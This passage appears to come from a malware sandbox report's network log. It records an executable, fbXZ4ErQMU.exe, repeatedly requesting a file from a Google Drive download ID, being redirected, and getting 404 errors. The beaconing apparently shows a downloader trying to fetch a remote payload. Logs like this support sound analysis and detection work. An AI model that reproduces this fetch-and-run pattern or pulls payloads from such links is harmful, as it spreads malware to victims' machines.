                                                        23 | 192.168.11.20 | 49774 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:05 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:05 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:05 GMT
                                                        Content-Security-Policy: script-src 'nonce-mXI6D9fuzwTjOamT_f25Mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5ha9xwpAGxrF9AObB47bH3WAIOg5Dd4kjUqHgAI8dpB3bPp8hJh8_xpLuWp-VySRfzavYgkXhgxg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:05 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jNDy2x0EWCNENYLden93GQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        24 | 192.168.11.20 | 49775 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:15 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-N6Q6yjkZpwbVK1Y-3gQSug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        25 | 192.168.11.20 | 49776 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:16 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:16 UTC | 1846 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:16 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-7USCs70f41WRI35N-mWk4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6qHkYESejmC0ulNAWyaT_t8XcQjCkB0xlVhRyBRpRN0R5KmXQ1crZPTUsJ3Heuv9hamg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:16 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KKw13rlfUuOsl7ZyHCUINA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        26 | 192.168.11.20 | 49777 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:26 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:27 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:27 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Xxd1_eVdV_-6hJR3nZFR4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        27 | 192.168.11.20 | 49778 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:27 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:27 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:27 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-1_3vcwjgMho-ygVstGkFxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC52Tl_ttFYP4gDCv83-FtwoQuinsDNQ3GdMzGFJXtSxcBWC159WHpfjYuwadzqPbCQwmc4QFe5gPA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:27 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZlMkPyfXPadB4g5SDjhkaQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        28 | 192.168.11.20 | 49779 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:38 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:38 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:38 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-c_OGKj0IwMgLBC15eilueg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        29 | 192.168.11.20 | 49780 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:38 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:38 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:38 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-F58rQQX3wQf1Sb5v-CAd6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4JnoAhu0c9FvuTKN8n48KKwWEE0s7jCWS2h8TNfETV2BpQF2jSmwbKWCJ0yKmDundOBN_33ttGaA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:38 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U9pgRH4Q0xYu0SyoEt7jfQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        30 | 192.168.11.20 | 49781 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:49 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:49 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:49 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ku--l54Nlg4jf_T1SOOI_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        31 | 192.168.11.20 | 49782 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:49 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:50 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:50 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-bqye9HMrsU07fFaF5gJCsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
